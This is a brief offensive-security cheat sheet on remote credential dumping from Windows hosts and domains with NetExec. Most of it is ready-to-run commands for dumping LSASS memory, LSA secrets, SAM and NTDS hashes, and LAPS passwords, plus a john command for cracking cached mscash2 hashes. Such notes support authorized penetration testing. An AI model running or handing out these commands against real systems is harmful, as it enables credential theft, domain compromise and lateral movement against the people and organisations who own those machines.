Remote Credential Dumping with NetExec
credentialswindowstool
Summary
Use NetExec/nxc to remotely dump LSASS, SAM, LSA, NTDS, and LAPS credentials over SMB/LDAP with admin creds, then crack the recovered hashes.
Walkthrough
NetExec (nxc) remotely extracts credentials from a Windows host or domain when you already hold admin credentials.
Steps
- Dump LSASS memory remotely with the
nanodumporlsassymodules (-M). - Pull stored secrets with
--lsa(LSA secrets),--sam(local hashes), and--ntds(domain hashes from a DC). - Retrieve LAPS passwords over LDAP with
--lapsor-M laps. - If creds fail against a standalone host, retry with
--local-auth. - Crack what you recover: cached (LSA/mscash2) hashes with john (
--format=mscash2); look up NTLM hashes on ntlm.pw.
Commands
bash
netexec smb <TARGET> -u 'admin' -p '<PASS>' -M nanodump netexec smb <TARGET> -u 'admin' -p '<PASS>' -M lsassy
bash
netexec smb <TARGET> -u 'admin' -p '<PASS>' --lsa netexec smb <TARGET> -u 'admin' -p '<PASS>' --sam netexec smb <TARGET> -u 'admin' -p '<PASS>' --ntds
bash
nxc ldap <IP> -u <USER> -p '<PASS>' --laps nxc ldap <IP> -u <USER> -p '<PASS>' -M laps
bash
john --wordlist=/usr/share/wordlists/rockyou.txt --format=mscash2 mscash_hashes